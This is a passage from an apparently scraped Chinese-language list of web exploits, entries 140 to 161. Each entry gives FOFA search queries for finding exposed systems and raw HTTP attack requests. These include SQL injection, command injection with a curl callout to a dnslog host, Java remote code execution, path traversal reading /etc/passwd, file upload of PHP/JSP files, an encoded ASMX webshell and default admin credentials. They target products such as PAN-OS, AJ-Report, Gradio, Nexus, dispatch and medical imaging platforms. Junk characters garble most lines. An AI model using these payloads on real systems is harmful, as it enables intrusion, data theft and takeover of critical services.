6 B/ H! K2 }- e, lGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.13 B) [4 A$ r' ~+ ?
Host: x.x.x.x
% R, F% D. X B; P" FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
' R4 K) O8 q8 q- w. w0 C* NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 e8 i N4 ^4 t; j/ S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 w, S- f# i2 e, W) T/ u! q' Q* }* \
Accept-Encoding: gzip, deflate, br
( v2 f6 A. a( _) A8 d- g, AConnection: close _/ ?% }" B: W ~- i" c4 Z% n
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
5 c3 y; C0 n) ~- p! T _0 F1 GUpgrade-Insecure-Requests: 1
8 |; K7 F0 W1 C: v& r3 G9 s8 c. [- f2 F
/ {7 K) Q$ Y2 u1 ]- ]4 @- y& K
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入; ?4 h) a9 a! ?( m) k4 W' l
CVE-2024-2566
2 F8 R! E5 }$ t( M5 [- d- [; \3 V& qFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
) x j- A) B4 \GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
) x! Y r+ r7 ] THost: x.x.x.x
+ M9 m6 ]0 ]. O) K& WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 O7 F7 x& K( M- O/ dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( Z6 s5 w! `' d& }$ h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 d7 ^# @4 D$ X: SAccept-Encoding: gzip, deflate, br
% c2 U3 ?( ~9 O) n5 }Connection: close' r F. P4 p6 S% I: z; A
Cookie: authcode=h8g94 ]( _$ p7 c& V4 b7 E1 T# N
Upgrade-Insecure-Requests: 15 j( I4 p) ^9 E( ]6 Z# I ~0 z- ^# l
. }5 J7 C8 d& G. E$ b
V1 b" t" k9 m: j4 j9 n8 x141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入7 G, G4 S! Y+ V. `5 r2 f) L
FOFA:body="指挥调度管理平台"
' H; X% c7 }+ V7 Y, r3 m, K: w! \1 aPOST /app/ext/ajax_users.php HTTP/1.13 t6 |) T% h" x7 K% ^; R, s9 }
Host: your-ip
: ?) j' E$ N8 C( J5 M- lUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info! w2 A" x& `: v7 D9 w: v
Content-Type: application/x-www-form-urlencoded& I3 ^0 w$ T& Y% N- u" c; P5 |( i" ~0 Z
: f% e* L. ^" e9 e- Y9 w- D: V
3 j0 G" i8 q( a/ z- qdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -- c( `3 K: f% q& n& @- H; O
: A$ C$ R+ L) G3 \
! X' z9 L3 ]0 o" a# }8 s142. CMSV6车辆监控平台系统中存在弱密码
' b% |5 k- G1 ] MCVE-2024-29666
( c. G U$ {( P2 _FOFA:body="/808gps/"
$ z! A( [: u7 T7 a/ }8 t1 Badmin/admin
, v7 ~ i# C9 q$ @4 P1 J143. Netis WF2780 v2.1.40144 远程命令执行
0 v- W7 u2 e0 o7 a% iCVE-2024-25850: p: i' P' ?% o- S) k; x
FOFA:title='AP setup' && header='netis'( |& C3 l$ Y0 B" w7 N1 |9 s
PAYLOAD4 _4 ?2 r: N! ?
. _. Y5 I3 ^" r8 }8 H
144. D-Link nas_sharing.cgi 命令注入' O. I2 o! x% r3 c( `( Z6 g
FOFA:app="D_Link-DNS-ShareCenter"
/ g" }6 z; D3 q6 h" ~1 t: [2 Lsystem参数用于传要执行的命令5 V0 A) C8 _* y: ?# {7 a% O
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
1 [8 S0 r! B- ?, i7 e0 a& M( _Host: x.x.x.x+ c& I! `; b. @" L4 @0 E
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0$ p; {# m$ e; Q; @0 x$ P1 E+ C
Connection: close
! C7 F# O9 k; |- mAccept: */*
7 h; x F- G8 X: x( }Accept-Language: en. X4 {4 O! x% y: b
Accept-Encoding: gzip
9 C" j* {8 _0 J/ e6 J; u% m! X: j# ~# B! @: H( I
: P5 `% I" z5 X, S* \ c1 J145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
" A8 }* j8 b3 W {4 DCVE-2024-3400& t* z! o# }4 G) A! _: B
FOFA:icon_hash="-631559155"0 a7 R( n% k8 E; `- p5 t2 h
GET /global-protect/login.esp HTTP/1.14 K5 | Q3 [5 M3 I9 t7 C
Host: 192.168.30.112:10059 K6 R) X: \. q! o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84: V% k$ N$ P2 M; x0 v3 s; M# y! t9 K
Connection: close# }+ H. L) h) W0 _
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;' r9 K8 T) D! x t7 Z+ e
Accept-Encoding: gzip! G9 c/ p" A/ I) s# S! L5 }, \
$ C8 W. R' C8 _$ J! b7 V
$ h7 W# P# [$ e3 ^& e& Y3 v146. MajorDoMo thumb.php 未授权远程代码执行
' u2 I* T4 U8 F7 BCNVD-2024-02175
. ]& S! t9 \' r+ n4 @8 W5 nFOFA:app="MajordomoSL"+ q% C, n# _$ L/ h" \
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1, Z% W/ O; a) E
Host: x.x.x.x
- ]' p6 H" w& z8 M* s- RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
! q- f3 a4 M1 ]( _' R% ^. X$ }Accept-Charset: utf-8
" t" q5 M4 }; ~( t- _3 ]Accept-Encoding: gzip, deflate
2 }( e% [% b! c0 W& X2 A: \Connection: close: i, E& f) j9 o/ g
& B& Z. B, F. ]) f$ W
B* ^3 w( t/ @! \147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
1 `+ P4 ~/ `% {- N) ]# ACVE-2024-32399/ J% i( }! \( ?, E( O
FOFA:body="RaidenMAILD"$ o3 G! W8 C8 ^7 h, i$ b
GET /webeditor/../../../windows/win.ini HTTP/1.1
* e7 Z. Y; |2 t2 c; eHost: 127.0.0.1:81& E: y* X7 d/ l; ^
Cache-Control: max-age=0
8 f8 i: ^: j1 s& ^1 f G( \1 K$ yConnection: close
" A: Z0 H- l: ]% \2 r1 l' j: j" S2 y! u
' `6 V! X' g% p+ B
148. CrushFTP 认证绕过模板注入" X2 z- F. D: b4 n: k! I$ @" u
CVE-2024-4040
0 K) {$ m# p8 R# _; Y8 dFOFA:body="CrushFTP": y6 N' u' p( @3 {( [/ L& T. Y6 G
PAYLOAD' E1 q+ ~. Z# I* O0 [" H) _2 `8 r
R6 l7 P8 b& `) R2 Y7 ?1 ~3 e2 j149. AJ-Report开源数据大屏存在远程命令执行
; _9 x2 Z) h# k: s% @ xFOFA:title="AJ-Report"
+ K) d& e4 E5 |+ l+ a) ?
0 E. j6 X9 | V) x) V- _7 gPOST /dataSetParam/verification;swagger-ui/ HTTP/1.17 W; c7 m c3 i* S$ |! F
Host: x.x.x.x
4 s% h) i) ^; s0 G6 y7 `' eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ v0 ^: `) f: h- H. }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" U9 [3 R0 T: S
Accept-Encoding: gzip, deflate, br
9 o* s+ P: L1 V6 a9 D: s1 CAccept-Language: zh-CN,zh;q=0.9
0 x' o+ n( J4 [& G7 `Content-Type: application/json;charset=UTF-89 l# _: z0 H; w! o. F
Connection: close
2 E: d Q# Y' E! p& W6 n
- D8 ~/ j% x' \' z/ n( Z2 X* U{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}8 k3 D* P/ c- l* y1 d7 f6 u
/ S) G) {+ ~ R. Q
150. AJ-Report 1.4.0 认证绕过与远程代码执行; A E9 g0 U5 I- q2 ~
FOFA:title="AJ-Report" @/ M" \9 [& a
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
" {, j- Y/ n- h1 t, aHost: x.x.x.x
- D! k1 S1 F" A9 l0 Q ?8 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: ?# d! v0 {2 Q9 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 ] P* G) B8 ]) nAccept-Encoding: gzip, deflate, br: [ C5 L. r3 l' ^+ m1 [. R! S
Accept-Language: zh-CN,zh;q=0.94 a# K8 N3 ^( b
Content-Type: application/json;charset=UTF-8
% Q+ @9 z3 |% y+ jConnection: close: z8 O/ ?' B- m
Content-Length: 339
3 x. i/ T, i$ \4 u* E$ U. a# q& d3 F1 \% l; b0 V: g
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}. G$ W! I: E" ], f' `
$ u7 s3 `0 k4 d' A( T$ P" e% I
7 v8 R* Y" R% i" F( _& K: z. C/ k151. AJ-Report 1.4.1 pageList sql注入
* S/ u8 |6 R7 tFOFA:title="AJ-Report"" h v7 `$ H3 [: Z" a2 n
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
; Z$ S8 R ]% x0 M* l& AHost: x.x.x.x
6 r) x; ?5 i" C1 c" l4 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( t6 c! h7 o- pConnection: close, b* l( i- i! e4 v: A
Accept-Encoding: gzip
9 ~! J# b- p- m1 L$ E: K5 E# ]4 a
0 K/ ]9 K" b: n: x/ C) Q# S
152. Progress Kemp LoadMaster 远程命令执行: Y: _0 O) H: \* r9 @
CVE-2024-1212
% I! h5 \0 J; E8 iLoadMaster <= 7.2.59.2 (GA)
+ [7 K J( }5 h( Z5 |7 D* c1 xLoadMaster<=7.2.54.8 (LTSF)
6 A8 u5 U. z, Y7 {/ [ f5 R- h3 wLoadMaster <= 7.2.48.10 (LTS)
$ G2 G9 }" W7 \FOFA:body="LoadMaster"0 I! {+ E. u% Q
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
$ c* L- C! }, kGET /access/set?param=enableapi&value=1 HTTP/1.16 N, `" B4 X* p# D- M1 O, x
Host: x.x.x.x
, k5 B% z) x( AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
( e6 z$ f/ J& j! G! D2 gConnection: close
6 Y, Y' ~5 @1 LAccept: */*
9 t6 B. Y! \8 v% r, FAccept-Language: en( B6 s/ t8 n8 O6 [
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=, V9 `6 o+ \% {7 m
Accept-Encoding: gzip( `5 z5 Y3 {9 j) \( ?
! A) `# U- }) P+ q) \9 Q
! H/ F# \4 n2 t4 i$ }9 e( ~153. gradio任意文件读取
2 c4 C9 G. |+ mCVE-2024-1561FOFA:body="__gradio_mode__"' W- E, |: L3 p
第一步,请求/config文件获取componets的id
# q0 D$ p2 [- ?* e( W- h" o6 vhttp://x.x.x.x/config$ _! L# x5 q: I4 H' F; g: ^, w
3 S" e* a" K5 O
' l. {8 u4 l' P C2 b% r; W
第二步,将/etc/passwd的内容写入到一个临时文件
) K5 Y5 X2 Y1 f+ CPOST /component_server HTTP/1.1
$ s, b8 T2 T. pHost: x.x.x.x+ h: Y1 q# S8 A1 q/ q2 M. J* D3 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3- p& f0 n4 I+ H& K
Connection: close
9 Z* V- N* `8 Q" G( u- E/ C+ xContent-Length: 1156 B3 R; k/ p, j3 c6 `) C
Content-Type: application/json
+ K' j; c7 O- h+ u6 {Accept-Encoding: gzip
& p# c" w1 f9 U$ S& u/ V
% \3 {/ b6 c1 p; D6 U{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}, }3 f) Z- w2 ?
2 \! O+ h/ g* y' r( ? @. } a* z9 p
9 f2 |# @' d* M6 U9 r" O第三步访问
: f: Q9 J" t- ehttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
j+ f7 V5 g0 J- B: [
7 e% k% C# y3 e# W! l' G7 Q7 F5 X& Y# Q3 P8 u6 P
154. 天维尔消防救援作战调度平台 SQL注入* Z2 W y0 m" C; o {
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
3 j0 |3 ?7 J4 F" {POST /twms-service-mfs/mfsNotice/page HTTP/1.1
4 R& {$ z6 Y+ e: c. RHost: x.x.x.x& g2 U4 N0 J2 z5 u/ b( i( k
Content-Length: 106( R7 P2 X; q8 o; ~5 Y" h
Cache-Control: max-age=0( Z' x$ ?4 ~" c* M8 L
Upgrade-Insecure-Requests: 1
" r$ D+ n8 n$ u8 Z& C* L6 \Origin: http://x.x.x.x
: w6 P7 h7 a$ @' [$ DContent-Type: application/json$ a! I# I" ~4 d- n/ z9 E. o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
" ]+ v5 Y% V+ \ g+ F& s5 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% G; Y! D( Z2 b
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
& T$ v! O U8 ~1 L4 I4 t% iAccept-Encoding: gzip, deflate
* v: c& Z- e: {& j+ ZAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
& K3 R2 @! U# q- `& r8 QConnection: close7 G" ^$ b) r: z2 i% R/ T
0 D4 [) i; }: F0 k/ D. `
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
' C. I* |$ p( Q! K& h1 j V& L, i6 C% H- g2 n- R/ t
7 l" W$ G8 L7 K- Q
155. 六零导航页 file.php 任意文件上传' O: ?7 P2 V" U6 H
CVE-2024-34982
7 s$ f+ b9 F8 T* R% k0 C! e5 OFOFA:title=="上网导航 - LyLme Spage"' W7 o& S6 Y3 d0 u: F4 D1 E
POST /include/file.php HTTP/1.1" a. ], m* @7 |* h* w9 n
Host: x.x.x.x' i' L% @) {2 z9 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
# G2 J: i; Q+ ~0 j. n$ nConnection: close9 ]" }% b7 k$ V; ]0 X) b
Content-Length: 232' R4 R$ {; H7 t. n
Accept: application/json, text/javascript, */*; q=0.01
~3 R& L: n6 {5 eAccept-Encoding: gzip, deflate, br
1 l$ ?8 P7 _2 E M8 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& x5 n- { S+ b W; L1 s, @6 t
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
9 H7 S3 e+ `; QX-Requested-With: XMLHttpRequest
- d4 k- C" O' g5 X1 A$ @$ m* F& s% {
-----------------------------qttl7vemrsold314zg0f
/ g' u, i4 M/ ?Content-Disposition: form-data; name="file"; filename="test.php"
: g5 [' Q' i8 t) X3 O' M( uContent-Type: image/png% U' G+ z, v3 p0 H' b3 w0 b
5 _3 X3 n! c) [* Y7 l
<?php phpinfo();unlink(__FILE__);?>
! k1 r- e* {* ?5 l-----------------------------qttl7vemrsold314zg0f--1 w9 D) }1 W7 Q- [& @( Q
: ~$ `) n, |8 |- \' n0 S5 n0 O. G
. D& ?$ h- p" ^+ s$ u Z访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
" D+ d2 f* x* y$ t1 y' X9 h) }) i' ?2 t4 b8 @
156. TBK DVR-4104/DVR-4216 操作系统命令注入/ I! P4 Y5 N/ N) r7 o$ q
CVE-2024-37210 T/ a4 W- {/ y- F( T1 f8 W. }
FOFA:"Location: /login.rsp"
2 ~' f; f; z" _6 }3 }2 w) F·TBK DVR-4104
u# a H# _* {+ y! I·TBK DVR-4216
( p y! ~; F, J4 A. fcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
# E) }) k' m1 h* t/ C5 c
0 j9 J5 `. u; ^& C
6 T/ E: c) E0 ~; q0 \8 ]POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
) K- g: f, @- kHost: x.x.x.x8 }! X: l1 M# E8 y+ l4 w% T
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* f8 b E- i* O5 K: N4 j; v! ?& H
Connection: close
, S0 {, [( v5 K7 x( nContent-Length: 0
9 Y8 r# r1 R, R: GCookie: uid=1
& {+ V& O# u2 }6 j( o4 gAccept-Encoding: gzip
. l. T) ?& Y4 l) B: l1 S- M. g1 i1 |2 ^: F
" ~. d2 ^4 Q- _. w7 Y- w157. 美特CRM upload.jsp 任意文件上传* T1 |! d7 K6 R& R2 Z
CNVD-2023-06971- E5 h6 M [% m$ \; U# D$ r6 X
FOFA:body="/common/scripts/basic.js"
i8 A- B1 v' t" n" g! rPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1" ?& B/ X8 D) R1 Q
Host: x.x.x.x
0 q$ g) R6 E" ~/ @: s, yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
; M+ V) @3 v rContent-Length: 709: i5 l5 E/ k, J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 h) r% U' g2 R1 J& J: ^Accept-Encoding: gzip, deflate$ s2 p: V3 p$ p3 ?0 [- ]: z i
Accept-Language: zh-CN,zh;q=0.9; r; t0 o8 H% Q& b& ]2 H( y# T, \& S7 E/ b
Cache-Control: max-age=0
! I, ?; I$ X$ g3 ~( h1 YConnection: close' m; h: `0 t P$ _& x6 V+ C4 A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
8 o7 e4 q3 E( D) {Upgrade-Insecure-Requests: 1- h; k. q2 U" U% h
& g$ k8 @2 S: ]2 m; s$ S6 k
------WebKitFormBoundary1imovELzPsfzp5dN
8 x; `. z5 B8 n1 E6 e8 F$ eContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
2 Y# t* F" M- v& L) C) QContent-Type: application/octet-stream/ T. P: Y' ^* M1 v, |, P
) A; p) } z0 u/ W# n/ {7 Lnyhelxrutzwhrsvsrafb( [( R0 g# ^: e, U7 l
------WebKitFormBoundary1imovELzPsfzp5dN
) k3 ?* Q$ z6 o- @Content-Disposition: form-data; name="key"% v+ n5 m% T# r6 n* r/ }
4 p6 {1 z1 }! R7 ]
null
" n" u8 ]' R( Q& j. ?5 M' q' G+ I+ s+ z------WebKitFormBoundary1imovELzPsfzp5dN- I2 Q; i- n1 o2 W4 `
Content-Disposition: form-data; name="form" J) S5 Z) x+ J8 I0 _7 X& b; D! R
' F( X: Z* F& W0 X. d2 {/ Anull
( |2 e, o" f) s" H2 v------WebKitFormBoundary1imovELzPsfzp5dN) t0 b* L( ~0 P/ L1 [$ m; S
Content-Disposition: form-data; name="field"* E( N2 |( a# D
6 k' s6 Y, |+ T0 G
null
4 R- Q( a; f# M3 Q9 S; x# [, _, k------WebKitFormBoundary1imovELzPsfzp5dN
& w; r. h- ^% J5 d# X, UContent-Disposition: form-data; name="filetitile"0 @5 x6 i) U& W$ i
# F5 E+ w$ X$ X& Y( i# gnull9 q$ ^$ B6 D' ]! ]
------WebKitFormBoundary1imovELzPsfzp5dN2 E+ w# O+ J/ v+ t/ |! @
Content-Disposition: form-data; name="filefolder"
, g3 H Y9 X3 L$ x; S
0 T" p5 b$ [3 x6 q2 t( k/ t# Jnull8 s( i& f$ u1 ] ?4 `$ l, z
------WebKitFormBoundary1imovELzPsfzp5dN--/ b( _$ ]$ P, L9 K4 j, r3 s
1 m2 ^$ s& e* q: g/ j
9 C1 ?% x3 B n( Z7 i, qhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
# \3 q- X& K- M! i" j$ N3 g4 H1 h
8 A. \ w& a7 Z( |158. Mura-CMS-processAsyncObject存在SQL注入( _' i1 i# M' @/ y) E" ^" X9 t
CVE-2024-32640
1 y* T- Y( X% W% _" {+ E+ cFOFA:"Generator: Masa CMS"1 e9 Z; r" V0 O
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
8 J4 x0 ~3 ~: T$ E! JHost: {{Hostname}}
a, M L) Q% X/ M& N) U$ [$ hContent-Type: application/x-www-form-urlencoded
" @7 z9 U- X6 B/ g& l. B6 Y( I1 ^ G9 ]; ^
object=displayregion&contenthistid=x\'&previewid=1
$ E' w( @7 Q7 q$ W% J2 L
. z( h& \ Q3 B( z5 O4 _4 J' u. k, u" Z
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传5 ]# g$ O" n$ x3 S. P
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")# X5 E7 c/ J* R( [
POST /webservices/WebJobUpload.asmx HTTP/1.1% t8 M1 T, x4 K6 L/ ?
Host: x.x.x.x
7 Y4 {6 u8 P+ k1 n! p6 K% \( a+ }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
! m% z/ l1 G" ]4 W0 [# G0 ^) \4 MContent-Length: 1080# Z. Q Z- I* Z: ]7 E* c# u
Accept-Encoding: gzip, deflate
, u( @, z% o+ I1 @+ _( rConnection: close
5 y7 _1 y' b* V6 WContent-Type: text/xml; charset=utf-8
0 O9 o3 s- a" h6 rSoapaction: "http://rainier/jobUpload"
% t3 A0 T4 V% { B
! J2 L' L' L7 @+ O* b<?xml version="1.0" encoding="utf-8"?>% {6 C" z" ~ d- E
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
3 g4 C; a, l$ Q: P* W* A; Y) ^1 Y<soap:Body>
+ s& l! C1 |/ c<jobUpload xmlns="http://rainier">
/ ~9 Q% `" e( h- l0 `<vcode>1</vcode>
# H5 I/ n! \' E! i<subFolder></subFolder>3 S% T: C& g( j6 L/ h
<fileName>abcrce.asmx</fileName>, N B, J8 i' [$ \7 S: O1 T
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>' o# i: p* P. m
</jobUpload>9 r7 _; z6 d+ ~! P, ~
</soap:Body>
+ k, R& o" S& J$ J' y h4 i9 N# v( `</soap:Envelope>3 v" H f+ g, M) ^
5 ^3 _; t+ i- T
! v. M% w' V! _7 J! w" T7 J
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
* M' |0 h8 s# d0 {1 ?4 ^; q, T8 q3 ~+ \, O9 V$ o" f
5 P0 g% Y" E7 }- x160. Sonatype Nexus Repository 3目录遍历与文件读取
2 D, h+ d8 G* E' @2 ?! p% eCVE-2024-4956
( I$ {$ K+ q5 \FOFA:title="Nexus Repository Manager"
3 O) d; k. Y- o" kGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1( }7 I9 n( o& k$ m- y
Host: x.x.x.x
. s2 _( T. f. UUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
2 C4 r% d7 } l3 |* [Connection: close4 o4 R# ]+ F2 h
Accept: */* J8 }4 o9 T6 z6 A( a
Accept-Language: en3 v, S! z2 ^3 B2 _) D$ y( M8 y* r6 m
Accept-Encoding: gzip: f8 W- J3 \4 c( K/ j
$ |- P0 j, k7 H& N# r+ l8 H2 @/ h' z$ K& z( n5 Y: T$ ^
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
/ n- o2 [* v2 {FOFA:body="/KT_Css/qd_defaul.css"2 c) F2 |6 C+ f) w( f4 F" m2 d
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密* x' T5 E8 J, I6 a8 L
POST /Webservice.asmx HTTP/1.13 `( H% c, r$ X& S% V1 }: g
Host: x.x.x.x7 F. }8 _' u. f' P' o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
# B5 X1 g! M/ F8 Y; BConnection: close
" |& g" B! z+ h3 `6 ]1 I) y+ X: h' pContent-Length: 445
7 H) z( W, i2 ^Content-Type: text/xml+ D' a8 z/ e: |# Z
Accept-Encoding: gzip
+ \& x1 N* x% w1 b0 p* E H# |0 Y
# u9 K* V% w% O. u9 \( x$ B9 J: X<?xml version="1.0" encoding="utf-8"?>
- Z8 o! O0 @/ A# I<soap:Envelope xmlns:xsi="
8 l- L; F# R a! Mhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"" ~8 `* T( P. p b
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
6 G) ]% g1 T: N. |<soap:Body>. d. p7 J* u: o! w; V' `
<UploadResume xmlns="http://tempuri.org/">
% T. ] S5 \# m% Q$ o" I/ T<ip>1</ip> T H. `1 q8 l U1 L$ P* o9 W
<fileName>../../../../dizxdell.aspx</fileName>
